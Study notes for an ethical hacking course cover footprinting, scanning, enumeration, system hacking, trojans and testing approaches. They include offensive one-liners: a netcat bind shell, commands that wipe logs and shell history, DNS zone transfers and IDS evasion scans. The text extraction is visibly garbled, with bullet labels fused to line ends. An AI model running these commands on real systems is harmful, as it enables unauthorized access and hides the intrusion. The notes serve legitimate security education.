ETHICAL HACKING

Complete Study Notes

Hacking Methodology | Footprinting | Scanning | Enumeration | System Hacking | Trojans | Black Box vs
White Box

UNIT 1: Introduction to Ethical Hacking

▶ 1.1 What is Ethical Hacking?

Ethical Hacking (also called Penetration Testing or White-Hat Hacking) is the practice of legally and
intentionally probing computer systems, networks, and applications to discover vulnerabilities before
malicious hackers can exploit them. An Ethical Hacker has explicit permission from the system owner
to attempt to breach security defenses.

Key Terms
Hacker A person who uses computer skills to gain unauthorized access to systems.
Not always malicious.

Cracker A malicious hacker who breaks into systems with criminal intent (damage,
theft, disruption).

Ethical Hacker A security professional hired to test systems using hacker techniques —
with permission.

Penetration A professional who simulates cyberattacks to evaluate the security of a

Tester system.

Types of Hackers (Hat Classification)

Hat Type Description
White Hat Ethical hackers who test systems with permission to improve security.
Black Hat Malicious hackers who break into systems for personal gain or
destruction.
 Grey Hat Hackers who operate between white and black — may exploit without
permission but disclose.
Script Kiddie Unskilled individuals who use existing tools/scripts without
understanding them.
Hacktivists Hackers driven by political or social motives (e.g., Anonymous).
State-Sponsored Government-backed hackers conducting cyber espionage or cyber
warfare.
Suicide Hacker Hackers who don't care about getting caught; attack for a cause
recklessly.

▶ 1.2 Hacking Methodology (CEH Framework)

The EC-Council Certified Ethical Hacker (CEH) methodology defines a structured process for ethical
hacking. It consists of 5 phases:

Phase Activity
Phase 1: Reconnaissance Gathering information about the target (passive & active).
Phase 2: Scanning Identifying open ports, services, OS, and vulnerabilities.
Phase 3: Gaining Access Exploiting vulnerabilities to enter the system.
Phase 4: Maintaining Access Keeping access via backdoors, rootkits, or trojans.
Phase 5: Covering Tracks Erasing evidence of the intrusion (logs, temp files).

Detailed Phase Breakdown

• Passive (OSINT, WHOIS, Google Dorking) + Active (port scanning, social
engineering).Reconnaissance:
• Network scanners (Nmap), Vulnerability scanners (Nessus, OpenVAS), war
[Link]:
• Exploiting buffer overflows, SQL injection, password cracking, session [Link]
Access:
• Installing rootkits, trojans, creating backdoor [Link] Access:
• Clearing Windows event logs, modifying syslog, using [Link] Tracks:

▶ 1.3 Process of Malicious Hacking

A malicious hacker (Black Hat) follows a similar methodology but with criminal intent and without
authorization. Understanding this process helps defenders build better security systems.
Steps in Malicious Hacking
• Select a victim based on potential gain (financial, political, personal).Target Identification:
• OSINT — social media, job postings, public records, WHOIS lookups, DNS
[Link] Gathering:
• Map the target's tech stack and identify known CVEs or [Link]
Analysis:
• Use automated tools (Metasploit, SQLmap) or custom exploits to breach
[Link]:
• Drop malware, ransomware, keyloggers, RATs (Remote Access Trojans).Payload Delivery:
• Move through internal network, escalate privileges (Pass-the-Hash, Kerberoasting).Lateral
Movement:
• Steal sensitive data using encrypted channels (DNS tunneling, HTTPS).Data Exfiltration:
• Delete logs, use anti-forensics tools, timestamp tampering, rootkit [Link]
Tracks:

Key Distinction Ethical hackers stop after gaining access and report vulnerabilities.
Malicious hackers continue to exploit, exfiltrate, and cover their tracks.
UNIT 2: Footprinting

▶ 2.1 What is Footprinting?

Footprinting (also called Reconnaissance) is the first and most critical phase of hacking. It involves
gathering as much information as possible about a target before launching an attack. The goal is to
create a complete profile of the target organization including its network, systems, employees, and
infrastructure.

Objectives of Footprinting
• Identify target's IP range and domain names.
• Discover network topology and architecture.
• Find employee names, roles, email IDs.
• Locate physical addresses and phone numbers.
• Identify OS, servers, and applications in use.
• Find open ports, services, and firewalls.

▶ 2.2 Types of Footprinting

Type Description & Examples
Passive Footprinting Gathering info without directly interacting with the target. Uses
public sources: OSINT, Google, WHOIS, social media, job boards.
Active Footprinting Directly interacting with the target. Examples: DNS queries,
traceroute, social engineering, port scanning.

▶ 2.3 Footprinting Techniques

A. Search Engine Footprinting
• Use advanced operators: site:[Link], filetype:pdf, intitle:"index of", inurl:adminGoogle
Dorking:
• Search engine for internet-connected devices — reveals open ports, services,
[Link]:
• Identify employees, tech stack from job postings, organizational [Link]/Social
Media:

B. WHOIS Lookup
WHOIS is a protocol that queries databases to find domain registration information.
• Registrant name, org, email, phone, DNS servers, registration & expiry [Link]:
• [Link], [Link], [Link], IANA [Link]:
◦ Command: whois [Link]
◦ Provides IP block ownership (ARIN, RIPE, APNIC registries).
C. DNS Footprinting
DNS (Domain Name System) records reveal critical infrastructure information.
Record Type Information Revealed
A Record Maps domain to IPv4 address.
AAAA Record Maps domain to IPv6 address.
MX Record Mail servers for the domain.
NS Record Authoritative name servers.
CNAME Canonical alias of a domain.
SOA Start of Authority — zone info, serial number.
TXT Record SPF, DKIM, verification strings.
PTR Record Reverse DNS — IP to hostname.

• nslookup, dig, host, DNSRecon, Fierce, [Link]:

◦ dig [Link] ANY — retrieves all records.
◦ Zone Transfer (AXFR): dig axfr @[Link] [Link] — dumps all DNS records
(misconfigured servers).

D. Network Footprinting
• Maps network path from source to target — reveals routers, hops, [Link]:
• ICMP pings to discover live hosts in a network [Link] Sweep:
• Identify ASN and IP routing [Link] Route Lookup:
• Tracert (Windows), traceroute (Linux), TCPTraceroute, Path Analyzer [Link]:

E. Email Footprinting
• Reveals sender IP, mail servers, timestamps, routing [Link] Header Analysis:
• Collect email addresses from websites, forums, breached [Link] Harvesting:
• theHarvester, [Link], Maltego, [Link]:

F. Website Footprinting
• HTTrack — download entire website for offline [Link] Mirroring:
• FOCA, ExifTool — extract hidden metadata from PDFs, images (author, GPS,
software).Metadata Extraction:
• [Link] — view historical versions of [Link] Machine:
• Reveal web server type (Apache/Nginx/IIS), scripting language, [Link] Headers:

▶ 2.4 Footprinting Tools Summary

Tool Purpose
Maltego Graphical link analysis for OSINT — maps relationships between
domains, IPs, people.
theHarvester Email, subdomain, IP, and host enumeration from public sources.
Shodan Search engine for internet-connected devices and services.
Recon-ng Modular web reconnaissance framework (like Metasploit for recon).
FOCA Metadata extraction from documents and websites.
SpiderFoot Automated OSINT with 200+ modules for comprehensive footprinting.
Google Dorks Advanced search queries to find sensitive information indexed by
Google.
Nmap (light) Basic ping sweeps and host discovery in active footprinting.
UNIT 3: Scanning

▶ 3.1 What is Scanning?

Scanning is the second phase of hacking where attackers probe the target network to discover live
hosts, open ports, running services, OS versions, and potential vulnerabilities. Unlike passive
footprinting, scanning directly interacts with the target.

Types of Scanning
• Discover active hosts, IP addresses in a [Link] Scanning:
• Find open TCP/UDP ports on target [Link] Scanning:
• Identify known security weaknesses, misconfigurations, unpatched [Link]
Scanning:

▶ 3.2 Port Scanning Techniques

Scan Type Description
TCP Connect Scan (-sT) Completes the full 3-way handshake. Reliable but easily
detected. Requires no special privileges.
SYN Stealth Scan (-sS) Sends SYN; if SYN-ACK received, sends RST instead of ACK.
Half-open — stealthy, faster. Requires root.
UDP Scan (-sU) Scans UDP ports. Slower — no connection confirmation. Used
for DNS(53), SNMP(161), TFTP(69).
NULL Scan (-sN) Sends packet with no flags set. No response = open/filtered.
Works against Unix systems.
FIN Scan (-sF) Sends packet with FIN flag. No response = open/filtered.
Bypasses some firewalls.
Xmas Scan (-sX) Sets FIN, PSH, URG flags (lights up like a Christmas tree).
Same behavior as NULL/FIN.
ACK Scan (-sA) Used to map firewall rules — determines if ports are filtered or
unfiltered.
Idle/Zombie Scan (-sI) Ultra-stealthy — uses a zombie host as intermediary. Attacker's
IP never appears in target logs.
Version Detection (-sV) Probes open ports to determine service name and version
number.
OS Detection (-O) Sends crafted packets and analyzes responses to determine
OS (TTL, TCP window size).
▶ 3.3 TCP 3-Way Handshake
Understanding TCP handshake is fundamental to understanding port scanning:
• Client sends SYN (synchronize) packet to initiate [Link] 1 — SYN:
• Server responds with SYN-ACK if port is open (accepts connection).Step 2 — SYN-ACK:
• Client sends ACK to establish connection. Port = [Link] 3 — ACK:
If server sends RST (Reset) → Port is CLOSED. No response → Port is FILTERED (firewall).

▶ 3.4 Nmap — The Network Mapper

Nmap is the most widely used network scanner. Syntax: nmap [Scan Type] [Options] {target}
Nmap Command Purpose
nmap [Link] Basic scan — top 1000 ports.
nmap -sS -p- [Link] SYN scan of all 65535 ports.
nmap -sV -O [Link] Service version + OS detection.
nmap -A [Link]/24 Aggressive scan: OS, version, scripts, traceroute on
subnet.
nmap -sU -p 53,161 [Link] UDP scan of DNS and SNMP ports.
nmap --script vuln [Link] Run vulnerability detection scripts (NSE).
nmap -sn [Link]/24 Ping sweep — discover live hosts only, no port scan.
nmap -D RND:10 [Link] Decoy scan — uses random IPs as decoys to confuse
IDS.

▶ 3.5 Banner Grabbing

Banner grabbing is the process of collecting service banners that expose software name and version
information.
• Connect to a service and capture the banner it [Link] Banner Grabbing:
• Capture banners from network traffic without connecting [Link] Banner Grabbing:
• Telnet, Netcat (nc), Nmap -sV, Curl, Wget, [Link]:
◦ nc -v [Link] 80 → then type: HEAD / HTTP/1.0
◦ telnet [Link] 25 → grabs SMTP banner.

▶ 3.6 Vulnerability Scanning

Vulnerability scanners automate the process of identifying known security weaknesses.
Tool Description
Nessus Industry-leading commercial vulnerability scanner. Detects CVEs,
misconfigs, missing patches.
OpenVAS Open-source vulnerability scanner — free alternative to Nessus.
Nikto Web server vulnerability scanner — checks for dangerous files,
outdated software, misconfigs.
Qualys Cloud-based vulnerability management platform.
Metasploit Exploitation framework with built-in vulnerability scanning via auxiliary
modules.

▶ 3.7 Evasion Techniques During Scanning

• Split packets into tiny fragments to evade IDS/IPS [Link]:
• Use multiple fake IP addresses alongside real attacker IP (Nmap -D).Decoy Scanning:
• Forge source IP to hide attacker's [Link] IP Spoofing:
• Send packets very slowly over hours to avoid rate-based [Link] Scanning:
• Route scan through a third-party host with predictable IP ID [Link]/Zombie Scan:
• Use uncommon protocols or ports that bypass firewall [Link] Manipulation:
UNIT 4: Enumeration

▶ 4.1 What is Enumeration?

Enumeration is the process of extracting detailed, actionable information from target systems after
discovery. Unlike scanning which identifies open doors, enumeration walks through those doors to
collect usernames, group names, machine names, network shares, services, and configurations. This is
typically an active interaction with the target system.
Key Difference Scanning finds what is open/running. Enumeration extracts the actual
data/resources exposed by those open services.

▶ 4.2 Information Gathered via Enumeration

• User accounts and group memberships.
• Machine names, hostnames, computer names on network.
• Network shares and printers.
• Routing tables and ARP tables.
• Service/application banners and versions.
• Auditing and security policies (password policies, lockout policies).
• SNMP community strings.
• VPN, RPC, NFS exports.

▶ 4.3 Enumeration Techniques by Protocol

A. NetBIOS Enumeration
NetBIOS (Network Basic Input/Output System) allows applications on different computers to
communicate over a LAN. It runs on port 137 (UDP), 138 (UDP), 139 (TCP).
• Computer name, workgroup, MAC address, logged-in users, shared [Link]:
• nbtstat, nbtscan, Hyena, [Link]:
◦ nbtstat -A [Link] → Shows NetBIOS table of remote machine.
◦ nbtscan [Link]/24 → Scans entire subnet for NetBIOS info.

B. SNMP Enumeration
SNMP (Simple Network Management Protocol) manages network devices. Uses community strings as
passwords. Default: 'public' (read) and 'private' (write). Runs on UDP port 161.
• System info, interfaces, routing tables, ARP table, running processes, installed
[Link]:
• Database of SNMP-managed [Link] (Management Information Base):
• snmpwalk, snmpcheck, Metasploit, SolarWinds MIB [Link]:
◦ snmpwalk -v2c -c public [Link] → Dumps all SNMP data.
◦ snmp-check [Link] -c public → Detailed SNMP enumeration.
C. LDAP Enumeration
LDAP (Lightweight Directory Access Protocol) is used to access directory services like Active Directory.
Runs on port 389 (LDAP) and 636 (LDAPS).
• Users, groups, OUs (Organizational Units), domain info, password [Link]:
• ldapsearch, JXplorer, Softerra LDAP Browser, [Link]:
◦ ldapsearch -x -H ldap://[Link] -b 'dc=target,dc=com'

D. NTP Enumeration
NTP (Network Time Protocol) synchronizes clocks. Runs on UDP port 123. Older NTP versions support
monlist command which returns list of last 600 clients.
• Hosts that have synchronized with NTP server — active hosts in [Link]:
• ntpdc, ntptrace, nmap NTP [Link]:
◦ ntpdc -c monlist [Link] → Reveals clients (also used in DDoS amplification).

E. SMB/CIFS Enumeration
SMB (Server Message Block) is used for file sharing. Runs on port 445 (direct) and 139 (via NetBIOS).
Critical for Windows network enumeration.
• Shared folders, user lists, group policies, OS version, domain [Link]:
• enum4linux, smbclient, Metasploit, CrackMapExec, [Link]:
◦ enum4linux -a [Link] → Full SMB enumeration including users and shares.
◦ smbclient -L //[Link]/ -N → List shares anonymously.

F. DNS Enumeration
• Transfer entire DNS zone — reveals all hostnames and [Link] Transfer (AXFR):
• Try common subdomain names (mail, vpn, dev, admin, test).Brute Force:
• DNSRecon, Fierce, dnsmap, Sublist3r, [Link]:
◦ dnsrecon -d [Link] -t axfr → Attempt zone transfer.
◦ fierce -domain [Link] → Brute-force subdomains.

G. SMTP Enumeration
SMTP (Simple Mail Transfer Protocol) on port 25 can reveal valid email usernames via VRFY and
EXPN commands.
• Verifies if a user exists (VRFY admin → returns 250 if user exists).VRFY command:
• Expands mailing lists to reveal member [Link] command:
• smtp-user-enum, Metasploit smtp_enum module, Nmap smtp-enum-users [Link]:

▶ 4.4 Enumeration Tools Summary

Tool Protocol/Purpose
enum4linux SMB/NetBIOS — comprehensive Windows/Samba enumeration.
nbtstat NetBIOS — shows name table, cache, and statistics.
snmpwalk SNMP — walks SNMP MIB tree to extract all data.
ldapsearch LDAP/Active Directory — query directory services.
rpcclient RPC — enumerate users, shares, printers via MS-RPC.
CrackMapExec SMB — mass enumeration and lateral movement tool.
Metasploit Various — auxiliary modules for all enumeration types.
PowerView Active Directory — powerful AD enumeration via PowerShell.
UNIT 5: System Hacking

▶ 5.1 What is System Hacking?

System Hacking involves gaining unauthorized access to computer systems by exploiting vulnerabilities
identified during the scanning and enumeration phases. The goal is to gain control over target systems,
escalate privileges, and maintain persistent access.

▶ 5.2 System Hacking Phases (CEH)

Phase Goal
Password Cracking Obtain valid credentials to authenticate.
Privilege Escalation Gain higher (admin/root) level access.
Executing Applications Run malicious code, install backdoors/keyloggers.
Hiding Files Conceal malicious files using steganography, ADS.
Covering Tracks Erase evidence of intrusion from logs.

▶ 5.3 Password Cracking

Password cracking is the process of recovering passwords from stored or transmitted hashes.

Password Attack Types

• Try words from a wordlist (e.g., [Link]). Fast but limited by [Link] Attack:
• Try all possible character combinations. Guaranteed success but very [Link] Force
Attack:
• Apply transformation rules to wordlist (capitalize, append numbers, l33t-speak).Rule-Based
Attack:
• Pre-computed hash tables for fast lookup. Defeated by [Link] Table Attack:
• Know partial password structure (e.g., 4 letters + 4 digits).Mask Attack:
• Combine dictionary + brute [Link] Attack:
• Use leaked username/password pairs from data breaches on other [Link] Stuffing:

Password Hashing
Algorithm Details
MD5 128-bit hash. Deprecated — collision attacks possible. Still used in
legacy systems.
SHA-1 160-bit hash. Deprecated — broken. Used in older TLS, Git.
SHA-256/512 Secure. Part of SHA-2 family. Used in modern systems.
NTLM Windows hash format. Vulnerable to Pass-the-Hash attacks.
bcrypt Password-specific hash with salt + cost factor. Resistant to brute force.
 LM Hash Legacy Windows hash (pre-Vista). Extremely weak — case-insensitive,
split into halves.

Password Cracking Tools

• GPU-accelerated password recovery. World's fastest cracker. Supports 300+ hash
[Link]:
• Classic CPU-based cracker. Great for Unix shadow files, ZIP, [Link] the Ripper:
• Windows password cracker using rainbow tables (LM/NTLM).Ophcrack:
• Online password brute-forcer for SSH, FTP, HTTP, RDP, SMB, [Link] Hydra:
• Fast parallel login [Link]:
• Online hash lookup [Link]:

▶ 5.4 Privilege Escalation

After gaining initial access (often as a low-privileged user), attackers escalate to admin or root.

Vertical Privilege Escalation

Moving from lower privilege to higher privilege (User → Admin → SYSTEM/Root).
• Kernel exploits (DirtyPipe on Linux, PrintSpoofer on Windows).Exploit Vulnerabilities:
• SUID binaries, sudo -l to list allowed [Link] Misconfigurations:
• Replace service binaries with malicious [Link] Service Permissions:
• Place malicious DLL in path that a privileged application [Link] Hijacking:
• Use Incognito/Metasploit to steal impersonation [Link] Impersonation:

Horizontal Privilege Escalation

Accessing another user's account at the same privilege level.
• Steal session cookies to access another user's [Link] Hijacking:
• Manipulate user IDs in [Link] (Insecure Direct Object Reference):

▶ 5.5 Maintaining Access

Backdoor Creation
• nc -lvp 4444 -e /bin/bash → Binds shell to port [Link] Backdoor:
• Advanced backdoor with keylogging, screenshot, and pivot [Link]
Meterpreter:
• PHP/ASP shell uploaded to web server (e.g., [Link], b374k).Web Shell:

Rootkits
A rootkit is malicious software that hides itself and other malware at a deep OS level.
• Modifies user-space processes and libraries. Easier to [Link]-Mode Rootkit:
• Modifies kernel code/drivers. Very stealthy. Hard to [Link]-Mode Rootkit:
 • Infects MBR or UEFI firmware. Survives OS [Link]:
• Runs below the OS — creates a virtual machine layer (Blue Pill technique).Hypervisor
Rootkit:
• rootkit hunters (rkhunter, chkrootkit), integrity checkers, memory [Link]:

▶ 5.6 Covering Tracks

Log Manipulation
• Clear Event Viewer logs — wevtutil cl System / Security / [Link]:
• Modify /var/log/[Link], /var/log/syslog, ~/.bash_history → echo '' > ~/.bash_historyLinux:
• Stop Windows Event Log service. Modify syslog [Link] Logging:

File Hiding Techniques

• Hide files in NTFS metadata streams — e.g., [Link]:[Link] ADS (Alternate
Data Streams):
• Hide data inside images, audio, or video files (steghide, OpenStego).Steganography:
• Kernel-level hooks intercept file system calls to exclude malicious files from
[Link] File Hiding:
UNIT 6: Trojans and Backdoors

▶ 6.1 What is a Trojan?

A Trojan (or Trojan Horse) is malicious software disguised as legitimate software. Unlike viruses,
Trojans do not self-replicate. They rely on social engineering to trick users into installing them. Once
active, they give attackers unauthorized remote access.
Origin Named after the Trojan Horse from Greek mythology — soldiers hidden
inside a gift to enemy city.

▶ 6.2 Types of Trojans

Trojan Type Description
Remote Access Trojan (RAT) Gives attacker full remote control: keylogging, webcam, file
access, shell. Examples: DarkComet, njRAT, Poison Ivy.
Backdoor Trojan Opens a secret port/channel for persistent remote access.
Example: NetBus, Back Orifice.
Downloader Trojan Downloads and installs additional malware once inside the
system.
Banker Trojan Targets online banking credentials — intercepts web forms,
2FA. Example: Zeus, TrickBot.
Rootkit Trojan Embeds rootkit alongside Trojan for deep system hiding and
persistence.
Data-Sending Trojan Silently exfiltrates files, screenshots, keystrokes to attacker's
C2 server.
Destructive Trojan Deletes files, corrupts data, formats drives. Example: NotPetya.
Proxy Trojan Turns victim machine into a proxy server to route attacker's
traffic anonymously.
FTP Trojan Opens FTP port on victim machine for file upload/download.
Security Software Disabler Disables antivirus, firewall, intrusion detection systems.

▶ 6.3 Trojan Communication

Command & Control (C2/C&C) Infrastructure
Trojans communicate with attacker's C2 server to receive commands and send stolen data.
• Blends with normal web traffic. Uses legitimate domains (domain fronting).HTTP/HTTPS
C2:
• Encodes commands in DNS queries — very stealthy (DNS tunneling).DNS C2:
 • Uses chat protocols as command [Link]/XMPP:
• Decentralized — no single takedown point. Example: ZeroAccess botnet.P2P C2:
• Commands embedded in Twitter/Facebook posts — legitimate platform, hard to
[Link] Media C2:

Overt vs Covert Channels

• Authorized communication path (normal network traffic).Overt Channel:
• Secret, unauthorized communication path hidden within overt [Link] Channel:
◦ Timing Channel: Information encoded in timing of packets.
◦ Storage Channel: Data hidden in unused header fields, DNS queries, HTTP headers.

▶ 6.4 Trojan Construction & Delivery

Wrapping/Binding Techniques
• Combine Trojan with legitimate file into single executable. Example: SFX archives,
[Link]/Binder:
• Rename [Link] to [Link] (exploits Windows hidden extensions).File
Extension Spoofing:
• Use legitimate application icon to appear [Link] Spoofing:

Delivery Methods
• Malicious attachment or link in spear-phishing [Link] Phishing:
• Visiting compromised website triggers automatic [Link]-by Download:
• Hidden in pirated software, cracked games, fake [Link] Bundling:
• Infected USB left in parking lot for curious [Link] Drops:
• Convincing victim to run the file [Link] Engineering:
• Compromise website frequently visited by target [Link] Hole:

▶ 6.5 Trojan Detection & Prevention

Detection Methods
• Signature-based and behavioral [Link]/EDR:
• Detect unusual outbound connections, high traffic, unknown C2 [Link]
Monitoring:
• Identify suspicious processes, unusual parent-child [Link] Monitor:
• Tripwire, AIDE — detect file system [Link] Checking:
• Detonate suspicious files in isolated environment (Cuckoo Sandbox, [Link]).Sandbox
Analysis:

Prevention
• Limit user permissions — Trojans can only do what user can [Link] of Least Privilege:
• Only allow approved applications to [Link] Whitelisting:
• Block executable attachments, scan [Link] Filtering:
• Train users to recognize phishing and social [Link] Education:
• Eliminate vulnerabilities Trojans exploit for [Link] Patching:
UNIT 7: Black Box vs White Box Techniques

▶ 7.1 Overview of Testing Methodologies

In penetration testing and ethical hacking, the amount of information provided to the tester before the
engagement defines the testing methodology. These methodologies represent different threat models
and testing scenarios.

▶ 7.2 Black Box Testing

In Black Box testing, the tester has NO prior knowledge of the internal structure, architecture, or source
code of the target system. The tester simulates an external attacker with zero insider knowledge.

Characteristics
• No access to source code, architecture diagrams, or internal documentation.
• Tester only knows the target's IP/domain — simulates real-world attacker.
• Focuses on externally visible attack surface.
• Also known as: External Testing, Zero-Knowledge Testing, Closed-Box Testing.

Black Box Testing Process

◦ Footprinting: OSINT, WHOIS, DNS enumeration, Google dorking.
◦ Scanning: Nmap port scans, banner grabbing, vulnerability scanning.
◦ Enumeration: SMB, SNMP, LDAP enumeration.
◦ Exploitation: Test discovered vulnerabilities with available exploits.
◦ Reporting: Document all findings, attack vectors, and recommendations.

Advantages of Black Box

• Most realistic simulation of an external cyberattack.
• No bias from knowledge of system internals.
• Tests effectiveness of perimeter defenses and detection capabilities.
• Uncovers vulnerabilities from attacker's perspective.

Disadvantages of Black Box

• Time-consuming — significant effort spent on reconnaissance.
• May miss internal vulnerabilities (insider threats, internal network issues).
• Results depend heavily on tester's skill and available time.
• Less comprehensive code-level analysis.

▶ 7.3 White Box Testing

In White Box testing (also called Clear Box or Glass Box testing), the tester has COMPLETE
knowledge of the internal system — including source code, architecture, network diagrams, credentials,
and configuration files.
Characteristics
• Full access to: source code, database schemas, network topology, API documentation.
• Simulates an insider threat or a developer reviewing their own code.
• Most thorough and comprehensive testing approach.
• Also known as: Internal Testing, Full-Knowledge Testing, Clear Box, Crystal Box.

White Box Testing Process

◦ Code Review: Static analysis — review source code for logic flaws, injection points,
hardcoded secrets.
◦ Architecture Review: Examine network design, trust boundaries, data flow diagrams.
◦ Configuration Review: Check server configs, firewall rules, ACLs, RBAC settings.
◦ Dynamic Analysis: Run the application with knowledge of internals — targeted testing.
◦ Vulnerability Verification: Confirm all known issues and discover new ones.

Advantages of White Box

• Most thorough — can find vulnerabilities deep in the codebase.
• Efficient — no time wasted on reconnaissance.
• Can test specific functions, modules, and logic paths.
• Excellent for SDLC integration (Security Development Lifecycle).

Disadvantages of White Box

• Time-consuming for large codebases.
• Tester bias — may assume certain inputs won't occur.
• Does not accurately simulate real attacker perspective.
• Requires specialized skills (code review, SAST tools).

▶ 7.4 Grey Box Testing

Grey Box testing is a combination — tester has partial knowledge of the internal system. It balances
realism with efficiency.
• Tester may have: login credentials, partial network diagrams, API documentation.
• Simulates: Compromised insider, partner/vendor with limited access.
• Best balance of thoroughness and realism in most real-world engagements.

▶ 7.5 Comparison Table

Factor Black Box | Grey Box | White Box
Knowledge Level None (0%) | Partial (50%) | Complete (100%)
Testing Perspective External Attacker | Insider / Partner | Developer / Auditor
Time Required High (recon-heavy) | Medium | Low to Medium
Comprehensiveness Low to Medium | Medium to High | Highest
Code Analysis No | Limited | Full (SAST, DAST)
Realism of Attack Sim Highest | High | Lower
Best For External perimeter test | Application testing | SDLC / Compliance
audits
Threat Model External adversary | Privileged insider | Developer/QA
Tools Used Nmap, Metasploit, OSINT | Both + Burp Suite | SAST tools, code
review
Cost High (time) | Medium | Can be high (expertise)

▶ 7.6 When to Use Which Approach

Use Black Box when:
• You want to test your external attack surface as a real hacker sees it.
• Measuring effectiveness of perimeter security and detection tools (SOC/IDS/IPS).
• Compliance requirements mandate an external perspective assessment.

Use White Box when:

• Conducting a thorough security audit of your own software before release.
• Integrating security testing into the SDLC (DevSecOps).
• Investigating a specific suspected vulnerability in code.
• Compliance: PCI-DSS, SOC2, HIPAA code security requirements.

Use Grey Box when:

• Testing a web application — have login credentials but not source code.
• Simulating a compromised user or low-level insider threat.
• Time-constrained engagement needing balance of coverage and realism.

QUICK REVISION SUMMARY

Topic Key Points to Remember

Ethical Hacking Legal, authorized penetration testing. White/Black/Grey hat. 5
CEH phases.
Hacking Methodology Recon → Scanning → Gaining Access → Maintaining Access →
Covering Tracks.
Malicious Hacking Same methodology, criminal intent, no authorization, data theft &
destruction.
Footprinting Passive (OSINT, WHOIS, DNS) + Active (direct interaction).
 Tools: Maltego, theHarvester, Recon-ng.
Scanning Port scanning (Nmap), banner grabbing, vulnerability scanning.
SYN scan = stealthiest.
Enumeration Extract real data: users, shares, policies. NetBIOS(137),
SNMP(161), LDAP(389), SMB(445).
System Hacking Password cracking → Privilege Escalation → Backdoors →
Rootkits → Cover Tracks.
Trojans Disguised malware. Types: RAT, Banker, Rootkit, Downloader.
C2 via HTTP/DNS.
Black Box Zero knowledge. Most realistic. External attacker simulation.
Time-intensive.
White Box Full knowledge. Most thorough. Includes code review. Best for
SDLC/compliance.
Grey Box Partial knowledge. Balanced approach. Most common in real
engagements.

Study Tip: Ethics First!

Always remember: Ethical hacking requires explicit written permission. Using these techniques without
authorization is illegal under computer crime laws worldwide.